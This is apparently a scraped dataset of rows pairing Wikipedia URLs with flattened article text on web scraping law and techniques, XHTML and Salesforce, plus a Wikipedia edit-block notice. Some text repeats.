considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
26 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#HTTP_programming | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
27 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=1 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Data scraping. |
28 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/XHTML | Extensible HyperText Markup Language (XHTML) is part of the family of XML markup languages which mirrors or extends versions of the widely used HyperText Markup Language (HTML), the language in which Web pages are formulated. 1 While HTML, prior to HTML5, was defined as an application of Standard Generalized Markup Language (SGML), a flexible markup language framework, XHTML is an application of XML, a more restrictive subset of SGML. XHTML documents are well-formed and may therefore be parsed using standard XML parsers, unlike HTML, which requires a lenient HTML-specific parser. 2 XHTML 1.0 became a World Wide Web Consortium (W3C) recommendation on 26 January 2000. XHTML 1.1 became a W3C recommendation on 31 May 2001. XHTML is now referred to as "the XML syntax for HTML" 3 4 and being developed as an XML adaptation of the HTML living standard. 5 6 XHTML 1.0 was "a reformulation of the three HTML 4 document types as applications of XML 1.0". 7 The World Wide Web Consortium (W3C) also simultaneously maintained the HTML 4.01 Recommendation. In the XHTML 1.0 Recommendation document, as published and revised in August 2002, the W3C commented that "The XHTML family is the next step in the evolution of the Internet. By migrating to XHTML today, content developers can enter the XML world with all of its attendant benefits, while still remaining confident in their content's backward and future compatibility. 7 However, in 2005, the Web Hypertext Application Technology Working Group (WHATWG) formed, independently of the W3C, to work on advancing ordinary HTML not based on XHTML. The WHATWG eventually began working on a standard that supported both XML and non-XML serializations, HTML5, in parallel to W3C standards such as XHTML 2.0. In 2007, the W3C's HTML working group voted to officially recognize HTML5 and work on it as the next-generation HTML standard. 8 In 2009, the W3C allowed the XHTML 2.0 Working Group's charter to expire, acknowledging that HTML5 would be the sole next-generation HTML standard, including both XML and non-XML serializations. 9 Of the two serializations, the W3C suggests that most authors use the HTML syntax, rather than the XHTML syntax. 10 The W3C recommendations of both XHTML 1.0 and XHTML 1.1 were retired on 27 March 2018, 11 12 along with HTML 4.0, 13 HTML 4.01, 14 and HTML5. 15 XHTML was developed to make HTML more extensible and increase interoperability with other data formats. 16 In addition, browsers were forgiving of errors in HTML, and most websites were displayed despite technical errors in the markup; XHTML introduced stricter error handling. 17 HTML 4 was ostensibly an application of Standard Generalized Markup Language (SGML); however the specification for SGML was complex, and neither web browsers nor the HTML 4 Recommendation were fully conformant to it. 18 The XML standard, approved in 1998, provided a simpler data format closer in simplicity to HTML 4. 19 By shifting to an XML format, it was hoped HTML would become compatible with common XML tools; 20 servers and proxies would be able to transform content, as necessary, for constrained devices such as mobile phones. 21 By using namespaces, XHTML documents could provide extensibility by including fragments from other XML-based languages such as Scalable Vector Graphics and MathML. 22 Finally, the renewed work would provide an opportunity to divide HTML into reusable components (XHTML Modularization) and clean up untidy parts of the language. 23 There are various differences between XHTML and HTML. The Document Object Model (DOM) is a tree structure that represents the page internally in applications, and XHTML and HTML are two different ways of representing that in markup. Both are less expressive than the DOM for example, may be placed in comments in the DOM, but cannot be represented in a comment in either XHTML or HTML and generally, XHTML's XML syntax is more expressive than HTML (for example, arbitrary namespaces are not allowed in HTML). XHTML uses an XML syntax, while HTML uses a pseudo-SGML syntax (officially SGML for HTML 4 and under, but never in practice, and standardized away from SGML in HTML5). Because the expressible contents of the DOM in syntax are slightly different, there are some changes in actual behavior between the two models. Syntax differences, however, can be overcome by implementing an alternate translational framework within the markup. First, there are some differences in syntax: 24 In addition to the syntactical differences, there are some behavioral differences, mostly arising from the underlying differences in serialization. For example: The similarities between HTML 4.01 and XHTML 1.0 led many websites and content management systems to adopt the initial W3C XHTML 1.0 Recommendation. To aid authors in the transition, the W3C provided guidance on how to publish XHTML 1.0 documents in an HTML-compatible manner, and serve them to browsers that were not designed for XHTML. 28 29 Such "HTML-compatible" content is sent using the HTML media type (text html) rather than the official Internet media type for XHTML (application xhtml xml). When measuring the adoption of XHTML to that of regular HTML, therefore, it is important to distinguish whether it is media type usage or actual document contents that are being compared. 30 31 Most web browsers have mature support 32 for all of the possible XHTML media types. 33 The notable exception is Internet Explorer versions 8 and earlier by Microsoft; rather than rendering application xhtml xml content, a dialog box invites the user to save the content to disk instead. Both Internet Explorer 7 (released in 2006) and Internet Explorer 8 (released in March 2009) exhibit this behavior. 34 Microsoft developer Chris Wilson explained in 2005 that IE7's priorities were improved browser security and CSS support, and that proper XHTML support would be difficult to graft onto IE's compatibility-oriented HTML parser; 35 however, Microsoft added support for true XHTML in IE9. 36 As long as support is not widespread, most web developers avoid using XHTML that is not HTML-compatible, 37 so advantages of XML such as namespaces, faster parsing, and smaller-footprint browsers do not benefit the user. 38 39 40 In the early 2000s, some Web developers began to question why Web authors ever made the leap into authoring in XHTML. 41 42 43 Others countered that the problems ascribed to the use of XHTML could mostly be attributed to two main sources: the production of invalid XHTML documents by some Web authors and the lack of support for XHTML built into Internet Explorer 6. 44 45 They went on to describe the benefits of XML-based Web documents (i.e. XHTML) regarding searching, indexing, and parsing as well as future-proofing the Web itself. In October 2006, HTML inventor and W3C chair Tim Berners-Lee, introducing a major W3C effort to develop a new HTML specification, posted in his blog that t he attempt to get the world to switch to XML ... all at once didn't work. The large HTML-generating public did not move ... Some large communities did shift and are enjoying the fruits of well-formed systems ... The plan is to charter a completely new HTML group. 46 The current HTML5 working draft says "special attention has been given to defining clear conformance criteria for user agents in an effort to improve interoperability ... while at the same time updating the HTML specifications to address issues raised in the past few years. Ian Hickson, editor of the HTML5 specification criticizing the improper use of XHTML in 2002, 41 is a member of the group developing this specification and is listed as one of the co-editors of the current working draft. 47 Simon Pieters researched the XML-compliance of mobile browsers 48 and concluded "the claim that XHTML would be needed for mobile devices is simply a myth". December 1998 saw the publication of a W3C Working Draft entitled Reformulating HTML in XML. This introduced Voyager, the codename for a new markup language based on HTML 4, but adhering to the stricter syntax rules of XML. By February 1999 the name of the specification had changed to XHTML 1.0: The Extensible HyperText Markup Language, and in January 2000 it was officially adopted as a W3C Recommendation. 49 There are three formal Document Type Definitions (DTD) for XHTML 1.0, corresponding to the three different versions of HTML 4.01: The second edition of XHTML 1.0 became a W3C Recommendation in August 2002. 50 Modularization provides an abstract collection of components through which XHTML can be subsetted and extended. The feature is intended to help XHTML extend its reach onto emerging platforms, such as mobile devices and Web-enabled televisions. The initial draft of Modularization of XHTML became available in April 1999, and reached Recommendation status in April 2001. 51 The first modular XHTML variants were XHTML 1.1 and XHTML Basic 1.0. In October 2008 Modularization of XHTML was superseded by XHTML Modularization 1.1, which adds an XML Schema implementation. It was superseded by a second edition in July 2010. 52 XHTML 1.1 evolved out of the work surrounding the initial Modularization of XHTML specification. The W3C released the first draft in September 1999; the Recommendation status was reached in May 2001. 53 The modules combined within XHTML 1.1 effectively recreate XHTML 1.0 Strict, with the addition of ruby annotation elements (ruby, rbc, rtc, rb, rt and rp) to better support East-Asian languages. Other changes include the removal of the name attribute from the a and map elements, and (in the first edition of the language) the removal of the lang attribute in favor of xml:lang. Although XHTML 1.1 is largely compatible with XHTML 1.0 and HTML 4, in August 2002 the Working Group issued a formal Note advising that it should not be transmitted with the HTML media type. 54 With limited browser support for the alternate application xhtml xml media type, XHTML 1.1 proved unable to gain widespread use. In January 2009 a second edition of the document (XHTML Media Types Second Edition) was issued, relaxing this restriction and allowing XHTML 1.1 to be served as text html. 55 The second edition of XHTML 1.1 was issued on 23 November 2010, which addresses various errata and adds an XML Schema implementation not included in the original specification. 56 (It was first released briefly on 7 May 2009 as a "Proposed Edited Recommendation" 57 before being rescinded on 19 May due to unresolved issues.) Since information appliances may lack the system resources to implement all XHTML abstract modules, the W3C defined a feature-limited XHTML specification called XHTML Basic. It provides a minimal feature subset sufficient for the most common content-authoring. The specification became a W3C recommendation in December 2000. 58 Of all the versions of XHTML, XHTML Basic 1.0 provides the fewest features. With XHTML 1.1, it is one of the two first implementations of modular XHTML. In addition to the Core Modules (Structure, Text, Hypertext, and List), it implements the following abstract modules: Base, Basic Forms, Basic Tables, Image, Link, Metainformation, Object, Style Sheet, and Target. 59 60 XHTML Basic 1.1 replaces the Basic Forms Module with the Forms Module and adds the Intrinsic Events, Presentation, and Scripting modules. It also supports additional tags and attributes from other modules. This version became a W3C recommendation on 29 July 2008. 61 The current version of XHTML Basic is 1.1 Second Edition (23 November 2010), in which the language is re-implemented in the W3C's XML Schema language. This version also supports the lang attribute. 62 XHTML-Print, which became a W3C Recommendation in September 2006, is a specialized version of XHTML Basic designed for documents printed from information appliances to low-end printers. 63 XHTML Mobile Profile (abbreviated XHTML MP or XHTML-MP) is a third-party variant of the W3C's XHTML Basic specification. Like XHTML Basic, XHTML was developed for information appliances with limited system resources. In October 2001, a limited company called the Wireless Application Protocol Forum began adapting XHTML Basic for WAP 2.0, the second major version of the Wireless Application Protocol. WAP Forum based their DTD on the W3C's Modularization of XHTML, incorporating the same modules the W3C used in XHTML Basic 1.0—except for the Target Module. Starting with this foundation, the WAP Forum replaced the Basic Forms Module with a partial implementation of the Forms Module, added partial support for the Legacy and Presentation modules, and added full support for the Style Attribute Module. In 2002, the WAP Forum has subsumed into the Open Mobile Alliance (OMA), which continued to develop XHTML Mobile Profile as a component of their OMA Browsing Specification. To this version, finalized in 2004, the OMA added partial support for the Scripting Module and partial support for Intrinsic Events. XHTML MP 1.1 is part of v2.1 of the OMA Browsing Specification (1 November 2002). 64 This version, finalized on 27 February 2007, expands the capabilities of XHTML MP 1.1 with full support for the Forms Module and OMA Text Input Modes. XHTML MP 1.2 is part of v2.3 of the OMA Browsing Specification (13 March 2007). 64 XHTML MP 1.3 (finalized on 23 September 2008) uses the XHTML Basic 1.1 document type definition, which includes the Target Module. Events in this version of the specification are updated to DOM Level 3 specifications (i.e., they are platform- and language-neutral). The XHTML 2 Working Group considered the creation of a new language based on XHTML 1.1. 65 If XHTML 1.2 was created, it would include WAI-ARIA and role attributes to better support accessible web applications, and improved Semantic Web support through RDFa. The inputmode attribute from XHTML Basic 1.1, along with the target attribute (for specifying frame targets) might also be present. The XHTML2 WG had not been chartered to carry out the development of XHTML1.2. Since the W3C announced that it does not intend to recharter the XHTML2 WG, 9 and closed the WG in December 2010, this means that XHTML 1.2 proposal would not eventuate. Between August 2002 and July 2006, the W3C released eight Working Drafts of XHTML 2.0, a new version of XHTML able to make a clean break from the past by discarding the requirement of backward compatibility. This lack of compatibility with XHTML 1.x and HTML 4 caused some early controversy in the web developer community. 66 Some parts of the language (such as the role and RDFa attributes) were subsequently split out of the specification and worked on as separate modules, partially to help make the transition from XHTML 1.x to XHTML 2.0 smoother. The ninth draft of XHTML 2.0 was expected to appear in 2009, but on 2 July 2009, the W3C decided to let the XHTML2 Working Group charter expire by that year's end, effectively halting any further development of the draft into a standard. 9 Instead, XHTML 2.0 and its related documents were released as W3C Notes in 2010. 67 68 New features to have been introduced by XHTML 2.0 included: HTML5 grew independently of the W3C, through a loose group of browser manufacturers and other interested parties calling themselves the WHATWG, or Web Hypertext Application Technology Working Group. The key motive of the group was to create a platform for dynamic web applications; they considered XHTML 2.0 to be too document-centric, and not suitable for the creation of internet forum sites or online shops. 69 HTML5 has both a regular text html serialization and an XML serialization, which is also known as XHTML5. 70 The language is more compatible with HTML 4 and XHTML 1.x than XHTML 2.0, due to the decision to keep the existing HTML form elements and events model. It adds many new elements not found in XHTML 1.x, however, such as section and aside tags. The XHTML5 language, like HTML5, uses a DOCTYPE declaration without a DTD. Furthermore, the specification deprecates earlier XHTML DTDs by asking the browsers to replace them with one containing only entity definitions for named characters during parsing. 70 XHTML RDFa is an extended version of the XHTML markup language for supporting RDF through a collection of attributes and processing rules in the form of well-formed XML documents. This host language is one of the techniques used to develop Semantic Web content by embedding rich semantic markup. An XHTML document that conforms to an XHTML specification is said to be valid. Validity assures consistency in document code, which in turn eases processing, but does not necessarily ensure consistent rendering by browsers. A document can be checked for validity with the W3C Markup Validation Service (for XHTML5, the Validator. nu Living Validator should be used instead). In practice, many web development programs provide code validation based on the W3C standards. The root element of an XHTML document must be html, and must contain an xmlns attribute to associate it with the XHTML namespace. The namespace URI for XHTML is http: www.w3.org 1999 xhtml. The example tag below additionally features an xml:lang attribute to identify the document with a natural language: In order to validate an XHTML document, a Document Type Declaration, or DOCTYPE, may be used. A DOCTYPE declares to the browser the Document Type Definition (DTD) to which the document conforms. A Document Type Declaration should be placed before the root element. The system identifier part of the DOCTYPE, which in these examples is the URL that begins with http: , need only point to a copy of the DTD to use, if the validator cannot locate one based on the public identifier (the other quoted string). It does not need to be the specific URL that is in these examples; in fact, authors are encouraged to use local copies of the DTD files when possible. The public identifier, however, must be character-for-character the same as in the examples. A character encoding may be specified at the beginning of an XHTML document in the XML declaration when the document is served using the application xhtml xml MIME type. (If an XML document lacks encoding specification, an XML parser assumes that the encoding is UTF 8 or UTF 16, unless the encoding has already been determined by a higher protocol.) For example: The declaration may be optionally omitted because it declares its encoding the default encoding. However, if the document instead makes use of XML 1.1 or another character encoding, a declaration is necessary. Internet Explorer prior to version 7 enters quirks mode, if it encounters an XML declaration in a document served as text html. XHTML 1.x documents are mostly backward compatible with HTML 4 user agents when the appropriate guidelines are followed. XHTML 1.1 is essentially compatible, although the elements for ruby annotation are not part of the HTML 4 specification and thus generally ignored by HTML 4 browsers. Later XHTML 1.x modules such as those for the role attribute, RDFa, and WAI-ARIA degrade gracefully in a similar manner. XHTML 2.0 is significantly less compatible, although this can be mitigated to some degree through the use of scripting. (This can be simple one-liners, such as the use of document.createElement() to register a new HTML element within Internet Explorer, or complete JavaScript frameworks, such as the FormFaces implementation of XForms.) The following are examples of XHTML 1.0 Strict, with both having the same visual output. The former one follows the HTML Compatibility Guidelines of the XHTML Media Types Note while the latter one breaks backward compatibility, but provides cleaner markup. 55 Example 1. Example 2. Notes: HTML5 and XHTML5 serializations are largely inter-compatible if adhering to the stricter XHTML5 syntax, but there are some cases in which XHTML will not work as valid HTML5 (e.g., processing instructions are deprecated in HTML clarify , are treated as comments, and close on the first , whereas they are fully allowed in XML, are treated as their own type, and close on ? ). 71 |
29 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Template:Data | A navbox for data-related topics. |
30 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Salesforce.com | Salesforce, Inc. is an American cloud-based software company headquartered in San Francisco, California. It provides customer relationship management (CRM) software and applications focused on sales, customer service, marketing automation, e-commerce, analytics, and application development. Founded by former Oracle executive Marc Benioff in February 1999, Salesforce grew quickly, making its initial public offering in 2004. As of September 2022, Salesforce is the 61st largest company in the world by market cap with a value of nearly US$153 billion. 2 It became the world's largest enterprise software firm in 2022. 3 Salesforce ranked 491st on the 2023 edition of the Fortune 500, making $31,352 million in revenues. 4 Since 2020, Salesforce has also been a component of the Dow Jones Industrial Average. 5 Salesforce was founded in 1999 by former Oracle executive Marc Benioff, together with Parker Harris, Dave Moellenhoff, and Frank Dominguez as a software-as-a-service (SaaS) company. 6 7 Two of Salesforce's earliest investors were Larry Ellison, the co-founder and first CEO of Oracle, and Halsey Minor, the founder of CNET. 7 Salesforce was severely affected by the dot-com bubble bursting at the beginning of the new millennium, resulting in the company laying off 20% of its workforce. Despite its losses, Salesforce continued strong during the early 2000s. Salesforce also gained notability during this period for its "the end of software" tagline and marketing campaign, and even hired actors to hold up signs with its slogan outside a Siebel Systems conference. 8 Salesforce's revenue continued to increase from 2000 to 2003, with 2003's revenue skyrocketing from $5.4 million in the fiscal year 2001 to over $100 million by December 2003. 9 Also in 2003, Salesforce held its first annual Dreamforce conference in San Francisco. 10 In June 2004, the company had its initial public offering on the New York Stock Exchange under the stock symbol CRM and raised US$110 million. 11 